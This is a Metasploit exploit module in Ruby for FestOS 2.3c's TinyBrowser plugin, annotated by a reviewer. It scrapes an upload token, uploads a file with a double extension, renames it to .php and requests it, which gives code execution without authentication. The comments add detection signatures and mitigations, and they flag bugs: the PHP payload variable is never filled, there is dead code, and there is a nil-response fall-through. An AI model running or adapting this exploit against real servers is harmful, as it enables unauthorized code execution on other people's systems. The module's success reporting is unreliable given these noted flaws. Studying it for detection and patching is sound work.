###
# Title : FestOS <= 2.3c TinyBrowser File Upload Code Execution (meta)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : File Upload Code Execution (via MetaSploit3)
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En]
##
# $Id: festos_tinybrowser.rb | 2011-05-31 01:10 | KedAns-Dz $
##

require 'msf/core'

# Metasploit module targeting the TinyBrowser (TinyMCE plugin) file manager
# shipped under FestOS's admin/includes/tiny_mce/plugins/tinybrowser path.
#
# Request sequence as implemented below (useful as a detection signature in
# web-server / WAF logs; none of the requests carry credentials, and the
# module declares 'Privileged' => false):
#   1. GET  .../tinybrowser/upload.php?type=file&folder=      (scrape "obfus" token)
#   2. POST .../tinybrowser/upload_file.php?...&obfuscate=... (multipart upload,
#      filename ending in ".ph.p")
#   3. GET  .../tinybrowser/upload_process.php?...&filetotal=1
#   4. POST .../tinybrowser/edit.php?type=file&folder=        (action=rename,
#      changing the extension)
#   5. GET  <URI>/images/demo/<random>.php                    (triggers the file)
# A rename action on edit.php that changes a file's extension, or an upload
# whose filename carries a double extension such as ".ph.p", are the
# events a defender would alert on; the mitigation implied by the
# description is to keep uploaded files non-executable and to not expose
# the plugin endpoints without authentication.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the single 'URI' option (the FestOS base
  # path, default "/"). All request paths below are built relative to it.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'FestOS <= 2.3c TinyBrowser File Upload Code Execution',
      'Description' => %q{
        This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
        By renaming the uploaded file this vulnerability can be used to upload/execute
        code on the affected system.
      },
      'Author' => [ 'KedAns-Dz ' ],
      'License' => MSF_LICENSE,
      'Version' => '1.0',
      'References' => [
        ['URL', 'http://1337day.com/exploits/16057'],
      ],
      'Privileged' => false,
      'Payload' => {
        'DisableNops' => true,
        'Compat' => {
          'ConnectionType' => 'find',
        },
        'Space' => 1024,
      },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => '08/05/2011',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URI', [true, "FestOS directory path", "/"]),
      ], self.class)
  end

  # Fingerprints the target by fetching upload.php and looking for the string
  # "flexupload.swf" in the response body.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is found, Safe
  #   otherwise (including on no response).
  #
  # NOTE(review): this only shows that the TinyBrowser upload page is reachable
  # at the expected path; it does not confirm that the upload or the rename
  # actually succeed. Read "Vulnerable" here as "plugin exposed". The regex
  # leaves the '.' unescaped, so it also matches e.g. "flexupload_swf".
  def check
    uri = ''
    uri << datastore['URI']
    # Ensure exactly one '/' between the base path and the plugin path.
    uri << '/' if uri[-1,1] != '/'
    uri << 'admin/includes/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='

    res = send_request_raw(
      {
        'uri' => uri
      }, 25)

    if (res and res.body =~ /flexupload.swf/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # NOTE(review): empty and never called from this file; the obfuscation token
  # is retrieved inline in #exploit instead. Dead code as written.
  def retrieve_obfuscation()
  end

  # Runs the upload / process / rename / trigger sequence described on the
  # class. Each HTTP step logs success or failure via print_status/print_error;
  # only a missing obfuscation token aborts the run early.
  def exploit
    # NOTE(review): empty as written; nothing assigns to it before it is
    # appended to the multipart body below.
    cmd_php = ''

    # Generate some random strings
    cmdscript = rand_text_alpha_lower(20)   # base name of the uploaded file
    boundary = rand_text_alphanumeric(6)    # multipart boundary

    # Static files
    directory = '/images/demo/'             # upload folder passed to the plugin
    uri_base = ''
    uri_base << datastore['URI']
    uri_base << '/' if uri_base[-1,1] != '/'
    uri_base << 'admin/includes/tiny_mce/plugins/tinybrowser'

    # Get obfuscation code (needed to upload files)
    # The token is scraped from upload.php as the first group of
    # /"obfus", "((\w)+)"\)/ and echoed back as the 'obfuscate' query parameter.
    obfuscation_code = nil
    res = send_request_raw({
      'uri' => uri_base + '/upload.php?type=file&folder='
    }, 25)
    if (res)
      if(res.body =~ /"obfus", "((\w)+)"\)/)
        obfuscation_code = $1
        print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
      else
        print_error("Error retrieving obfuscation code!")
        return
      end
    end
    # NOTE(review): when res is nil (no response) execution falls through
    # with obfuscation_code still nil, and the upload below is attempted anyway.

    # Upload shellcode (file ending .ph.p)
    # Hand-built multipart/form-data body with two parts: "Filename" (text)
    # and "Filedata" (the file, sent as application/octet-stream).
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    data << "#{cmdscript}.ph.p\r\n--#{boundary}"
    data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
    data << "Content-Type: application/octet-stream\r\n\r\n"
    data << cmd_php
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri' => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
      'method' => 'POST',
      'data' => data,
      'headers' => {
        'Content-Length' => data.length,
        'Content-Type' => 'multipart/form-data; boundary=' + boundary,
      }
    }, 25)

    # Success is judged purely on the response body text.
    if (res and res.body =~ /File Upload Success/)
      print_status("Successfully uploaded #{cmdscript}.ph.p")
    else
      print_error("Error uploading #{cmdscript}.ph.p")
    end

    # Complete the upload process (rename file)
    # NOTE(review): the status text implies the server stores the upload with a
    # trailing "_" until upload_process.php runs; that behaviour is not visible
    # here. The response of this request is never inspected.
    print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
    res = send_request_raw({
      'uri' => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
    })

    # Rename the file from .ph.p to .php
    # NOTE(review): the form submits renamefile[0] = "<name>.ph" and
    # renameext[0] = "p"; how edit.php combines them is not visible here. The
    # log messages assume the result is "<name>.php".
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => uri_base + '/edit.php?type=file&folder=',
        'vars_post' => {
          'actionfile[0]' => "#{cmdscript}.ph.p",
          'renameext[0]' => 'p',
          'renamefile[0]' => "#{cmdscript}.ph",
          'sortby' => 'name',
          'sorttype' => 'asc',
          'showpage' => '0',
          'action' => 'rename',
          'commit' => '',
        }
      }, 10)

    if (res and res.body =~ /successfully renamed./)
      # NOTE(review): the space before "(" makes Ruby parse the argument as a
      # grouped expression (it works, but emits a parser warning).
      print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
    else
      print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
    end

    # Finally call the payload
    # A plain GET of the renamed file under the upload directory; the response
    # is not checked.
    print_status("Calling payload: #{cmdscript}.php")
    uri = ''
    uri << datastore['URI']
    uri << '/' if uri[-1,1] != '/'
    uri << directory + cmdscript + ".php"

    res = send_request_raw({
      'uri' => uri
    }, 25)
  end
end